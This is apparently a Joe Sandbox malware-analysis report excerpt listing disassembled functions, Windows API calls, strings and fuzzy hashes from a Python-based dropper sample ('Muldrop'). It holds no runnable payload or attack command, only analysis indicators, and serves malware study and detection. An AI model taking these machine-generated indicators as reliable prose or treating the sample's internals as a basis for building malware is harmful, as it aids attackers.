                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                            • Instruction Fuzzy Hash: 21112626E0EAEF01FB54309CF0613B4E9406F77328F870630FB6E466DE8EAD58A00120
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BF4F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BF6E
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BF96
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BFA7
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7B110B147,?,?,00000000,00007FF7B110B3E2,?,?,?,?,?,00007FF7B11036AC), ref: 00007FF7B110BFB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                            • Instruction ID: 4a3ce8eb9aaab0b10e90f8dcf0178cd6c5d40447aa9186e4078aaad9b7db18f1
                                                            • Opcode Fuzzy Hash: 5469ad97ef1dc323ed31f4bb816bde73ef5dcee44b4409764bd7785a0893e436
                                                            • Instruction Fuzzy Hash: D511A754E0C60B41F7587329B55A1359343CF663A8FE48334EA3D476CECEACA4018625
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                            • Instruction ID: d5bcbb880f9053a1fd17ccb45c51d50fac8e436428034ee5912daf74a12eb0cb
                                                            • Opcode Fuzzy Hash: 8f64e276412905fb556d0cf6e5ae689124ad209186916bebc7020e596f8a9cd9
                                                            • Instruction Fuzzy Hash: D4111958E0820F42FB687329745A579A342CF67368EF48734EB3D452DADDACB8018625
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: verbose
                                                            • API String ID: 3215553584-579935070
                                                            • Opcode ID: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                            • Instruction ID: e0b93580a5207de1f888e66c4309c9a80b8c2142710a683fff3858e39b9eb9ed
                                                            • Opcode Fuzzy Hash: 1c0dd48f447bd5919c4c0af8999980ceaa421a823445f2473d5a297136b7fe44
                                                            • Instruction Fuzzy Hash: 2091C522E08A4E81E720AE29E45837DB790EB66B5CFE44135DB8D473C9DEBCE445C320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                            • Instruction ID: b3d25d7332575b5bdf29934f01a4446e3c8fd03c7341bbe1ee36c1e21865b7c4
                                                            • Opcode Fuzzy Hash: d575cc9c9c6fff3bb6b887c91fcc14de71c27d2c4b886d2e4095e12dd43ef316
                                                            • Instruction Fuzzy Hash: B681C635D0820A85FB646F1DA15227CF6A8AB33B4CFD74031CB0D9769DDAADF5218721
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 2395640692-1018135373
                                                            • Opcode ID: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                            • Instruction ID: 7d5529c6e0d2cc9411fa3495316e893971aa6a7ef6b1477eb5cca3128afbd7ba
                                                            • Opcode Fuzzy Hash: 9937fcd42addf426bdc80adcc1b9a62f0535f05a99127480d1a1977f785d18a7
                                                            • Instruction Fuzzy Hash: 4A51B032A196028ADB14EF19E586A3CA791EB65B8CF858131EB4D4378CDFBCE845C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                            • Instruction ID: 7ecdee88e30bd90edaae6cdabe63325c28458c945aabb9600368f7b1b716c72e
                                                            • Opcode Fuzzy Hash: e4646d365215256e67ec22a9df473d11678327abea87c6de7235dddbff79b36e
                                                            • Instruction Fuzzy Hash: C6618333908BC581D7609B19E4813AAF7A0FBA6B98F444225EB9C53B59CFBCD191CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                            • Instruction ID: dd981827b9e1467a569c2025a812086018e45c678bf5b39bb8baeaefac9c150d
                                                            • Opcode Fuzzy Hash: 723dedddd72afc6468d282760165df683ca6c1680e5e3aacb3d58d0999c557cb
                                                            • Instruction Fuzzy Hash: 2A51C43390824686EB64AF199086268B790FBA6B8CF944135DB8C47BDDCFBCE854C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: %s%s: %s$Fatal error detected
                                                            • API String ID: 1878133881-2410924014
                                                            • Opcode ID: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                            • Instruction ID: 4ad632826b433992ec58cb73cc5a008d732bcb472dc55e755a6746d88febd390
                                                            • Opcode Fuzzy Hash: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                            • Instruction Fuzzy Hash: D231617262868681E720EB14F4916DAE364FF95B88FC04036E78D47A9DDF7CD605CB50
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F3EE1
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastMessageModuleName
                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                            • API String ID: 2581892565-1977442011
                                                            • Opcode ID: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                            • Instruction ID: dce7dd1568ff17bc687f7b07ef8b35a4957087429372f0a6b304b2797560665a
                                                            • Opcode Fuzzy Hash: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                            • Instruction Fuzzy Hash: AB011251B1D64784FB60B718E4963B5D351AF6A7C8FC10431DA4D8629EEE9CE215C620
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                            • String ID:
                                                            • API String ID: 2718003287-0
                                                            • Opcode ID: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                            • Instruction ID: f5941ae5bc44774b4a537be55753450097c92f399b5480db914d635055d14729
                                                            • Opcode Fuzzy Hash: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                            • Instruction Fuzzy Hash: 53D10E72F08A8589EB10DF69E4442ACB7B5EB2679CB944235CF4DD7B89DE78D406C310
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                            • String ID:
                                                            • API String ID: 2780335769-0
                                                            • Opcode ID: c83329a2bd18a21367976a5c4af3d00e11dcc87eb128c326a6acb0b8d0e7847d
                                                            • Instruction ID: e2423e65366464eced4db86ad83e28aa75bedf55f581b19cc54c1b063289bedb
                                                            • Opcode Fuzzy Hash: c83329a2bd18a21367976a5c4af3d00e11dcc87eb128c326a6acb0b8d0e7847d
                                                            • Instruction Fuzzy Hash: E9517D22E046458AFB50EF69E4443BDB3A1EB6AB5CFA04139DB0D46689DFBCD4418721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$DialogInvalidateRect
                                                            • String ID:
                                                            • API String ID: 1956198572-0
                                                            • Opcode ID: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                            • Instruction ID: 0023772962e75975d6a6ad446ed24b2e7f597928afb234dd3ef8c866ffa1a545
                                                            • Opcode Fuzzy Hash: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                            • Instruction Fuzzy Hash: F0112961A1C14242F744AB6EF5853BDD351EFA6B84FC98030EB4806B9DCDBCD5C14210
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                            • String ID: ?
                                                            • API String ID: 1286766494-1684325040
                                                            • Opcode ID: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                            • Instruction ID: 2b5a1b5e534ef5501de0d7ce3aae900a66add7fbdb9d20e3e4d401811230c0cb
                                                            • Opcode Fuzzy Hash: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                            • Instruction Fuzzy Hash: 7B413A12A0838E46F760AB29B4013BAD751EBA27ACF914235EF5C06ADDEEFDD451C710
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B1109BB6
                                                              • Part of subcall function 00007FF7B110B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                              • Part of subcall function 00007FF7B110B4EC: GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7B10FC125), ref: 00007FF7B1109BD4
                                                            Strings
                                                            • C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, xrefs: 00007FF7B1109BC2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                            • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                            • API String ID: 2553983749-2061591972
                                                            • Opcode ID: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                            • Instruction ID: 16294694b15b5211dfde6b961f113b65f26557b9842c1492e5796eb6c2b8e8b0
                                                            • Opcode Fuzzy Hash: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                            • Instruction Fuzzy Hash: D041C336E08B4A85EB14FF29B4940B8A395EF567D8BA54035EB0E43B4DDEBCD4818320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastWrite
                                                            • String ID: U
                                                            • API String ID: 442123175-4171548499
                                                            • Opcode ID: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                            • Instruction ID: 1267abbeb22d34578140706e89224bcee9dfad3d948cc879710998fe45632c49
                                                            • Opcode Fuzzy Hash: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                            • Instruction Fuzzy Hash: A741D222A18A4981DB20AF29F8443A9B761FBA9788F914135EF4DC778CEF7CD541C750
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID: :
                                                            • API String ID: 1611563598-336475711
                                                            • Opcode ID: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                            • Instruction ID: 360914d15e2a1ce6765cc70c5ff4610b51b8ba25de5fcbf15d44f5e875ee9542
                                                            • Opcode Fuzzy Hash: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                            • Instruction Fuzzy Hash: 1121EE23E0864A82EB20AB19E44966DF3B1FB96B4CFD18035D74D43289DFBCD545C7A1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Fatal error detected
                                                            • API String ID: 1878133881-4025702859
                                                            • Opcode ID: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                            • Instruction ID: e19756eafa73aa0b9cccd69f3eabd86b6dbc94a9955b3dd9b859ea21f9dc805c
                                                            • Opcode Fuzzy Hash: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                            • Instruction Fuzzy Hash: DC21B47262868681EB20EB19F4916EAE364FFA5788FC00135E74D47A5DDF7CD215CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message$ByteCharMultiWide
                                                            • String ID: Error detected
                                                            • API String ID: 1878133881-3513342764
                                                            • Opcode ID: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                            • Instruction ID: a89100743298aa394df7a0bc1ee220fbe075d417e044e5c59ac706c83a0238ca
                                                            • Opcode Fuzzy Hash: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
